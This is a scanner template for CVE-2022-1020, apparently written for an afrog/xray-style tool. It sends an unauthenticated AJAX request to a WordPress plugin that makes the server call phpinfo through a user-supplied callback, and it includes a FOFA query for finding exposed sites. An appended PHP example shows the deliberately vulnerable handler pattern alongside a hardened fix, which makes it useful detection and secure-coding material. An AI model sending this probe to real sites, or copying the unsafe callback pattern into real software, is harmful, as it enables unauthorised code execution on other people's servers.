CVE-2022-1020.yaml
24 lines (21 loc) · 1.09 KB
```yaml
id: CVE-2022-1020

info:
  name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call
  author: Akincibor
  severity: critical
  verified: true
  description: |-
    WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option
    AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the
    callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
    fofa title="WordPress WooCommerce "
  reference:
    - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1020

rules:
  r0:
    request:
      method: POST
      path: /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option
      body: option_key=a&perpose=update&callback=phpinfo
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
expression: r0()
```
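As an added illustration (not the affected plugin's code and not part of this template), the unsafe pattern the description refers to is shown beside a hardened WordPress AJAX handler for the same action: the fix is a nonce check, a capability check, and replacing the client-named callback with a fixed operation map. The hook names, nonce action, operation names and option keys are assumptions.

```php
<?php
// Unsafe pattern described on the page: reachable via the nopriv hook, no nonce,
// no capability check, and the client names the function to call.
// (Hypothetical reconstruction of the flaw class, not the plugin's code.)
add_action( 'wp_ajax_nopriv_wpt_admin_update_notice_option', 'wpt_notice_unsafe' );
add_action( 'wp_ajax_wpt_admin_update_notice_option', 'wpt_notice_unsafe' );
function wpt_notice_unsafe() {
    $callback = $_POST['callback'];                                  // attacker-controlled
    $arg      = isset( $_POST['option_key'] ) ? $_POST['option_key'] : null;
    call_user_func( $callback, $arg );                               // arbitrary function, 0 or 1 argument
    wp_die();
}

// Hardened handler. Registered for authenticated users only; the nopriv hook
// is deliberately absent so unauthenticated requests never reach it.
add_action( 'wp_ajax_wpt_admin_update_notice_option', 'wpt_notice_hardened' );
function wpt_notice_hardened() {
    // 1. CSRF: the request must carry a nonce issued for this action
    //    (wp_create_nonce( 'wpt_admin_notice_nonce' ) on the admin page; assumed name).
    check_ajax_referer( 'wpt_admin_notice_nonce', 'nonce' );

    // 2. Authorisation: an authenticated subscriber is still not an administrator.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 3. No user-supplied callback at all: the client picks an operation name,
    //    the server maps it to an internal function. Unknown names are rejected.
    $allowed = array(
        'update'  => 'wpt_notice_update',
        'dismiss' => 'wpt_notice_dismiss',
    );
    $op  = isset( $_POST['perpose'] )    ? sanitize_key( wp_unslash( $_POST['perpose'] ) )    : '';
    $key = isset( $_POST['option_key'] ) ? sanitize_key( wp_unslash( $_POST['option_key'] ) ) : '';
    if ( ! isset( $allowed[ $op ] ) || '' === $key ) {
        wp_send_json_error( array( 'message' => 'invalid request' ), 400 );
    }
    call_user_func( $allowed[ $op ], $key );
    wp_send_json_success();
}

// Internal operations; the option prefix is an assumption.
function wpt_notice_update( $key )  { update_option( 'wpt_notice_' . $key, 'seen' ); }
function wpt_notice_dismiss( $key ) { update_option( 'wpt_notice_' . $key, 'dismissed' ); }
```

With the hardened handler in place, the template's request above fails at the nonce check (and, lacking a session, never reaches the handler at all), so the `PHP Version` markers the rule looks for never appear in the response.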